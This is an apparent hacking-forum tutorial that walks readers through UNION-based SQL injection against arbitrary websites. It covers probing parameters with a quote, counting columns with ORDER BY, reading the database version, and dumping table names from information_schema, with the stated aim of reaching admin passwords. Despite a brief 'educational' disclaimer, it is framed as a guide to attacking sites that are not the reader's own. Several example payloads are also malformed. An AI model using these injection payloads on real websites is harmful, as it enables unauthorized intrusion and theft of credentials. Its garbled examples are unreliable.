[TUT] How to hack websites

**This is purely for educational and entertainment reasons. I do not condone anyone using this guide for illegal purposes**

Well, I will be teaching the easiest way to hack a website, this is via SQL injection (SQLi). A good way to prepare for this learning is reading up on how MySQL works, even downloading it, and working with it yourself.

1) Find a vuln. website - This means finding a website vulnerable to SQLi. You can check this by looking for pages with an '=' sign. This means it's taking information from a database, meaning you have a potential exploitation area. To check it, use the ' rule.

Example: www.examplesite.com/pageid=1' or www.examplesite.com/pageid='1

2) If it is vuln then you should get 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc...' If not, move on to a different site.

3) Now to check how many columns are in the table. To do this we want to use the order by command, starting with 1, 2 then maybe jumping to 10. We do this until we get an error. Say we get no error on 1 or 2, but an error on 10, come down to 5 or so. We must also use the -- or /* rule. Both mean the same, but sometimes either one or the other works. There's more types of these rules, google is your friend.

Example: www.examplesite.com/pageid=1 order by 1-- or www.examplesite.com/pageid=1 order by 1/*
No errors on these

Example: www.examplesite.com/pageid=1 order by 5-- or www.examplesite.com/pageid=5/*
Error on this one, so we try;

Example: www.exmaplesite.com/pageid=1 order by 4-- or www.examplesite.com/pageid=4/*
No error here. There are 4 columns.

4) Now check that the Union function works. The union function allows us to group multiple columns, rows, etc. together. Union all the columns you have. After doing this, you should see at least one number display.

Example: www.examplesite.com/pageid=1 union all select 1,2,3,4-- or www.examplesite.com/pageid=1 union all select 1,2,3,4/*
In this case, number 2 shows up.

5) Now we must check for MySQL version as this decides which technique we will use next. Blind SQLi, or in my terms, normal. If it's more than version 5, we use the classic technique, its it's less than 5, you use blind SQLi and I'm not going over that in this tut. Anyway, to check for the version, remember what number was displayed from the previous union all select command, then replace that number with @@version but keeping the rest of the column numbers.

Example: www.examplesite/com/pageid=1 1,@@version,3,4-- or www.examplesite/com/pageid=1 1,@@version,3,4/*
The version will now show up and hopefully it's more than 5.

6) Now to find the table names. We will be asking the database to give us all the table names from table name list by replacing our vuln column number (in this case, 2) with table_names and using the from command for information_schema.tables.

Example: www.examplesite/com/pageid=1 1,table_name,3,4 from information_schema.tables
A list of table names displays. Look for admin, administrators etc. In this case, it's admin

To be continued
Selecting columns from the tables
Using column names to combine admins and their passwords
How to stay safe
Voila.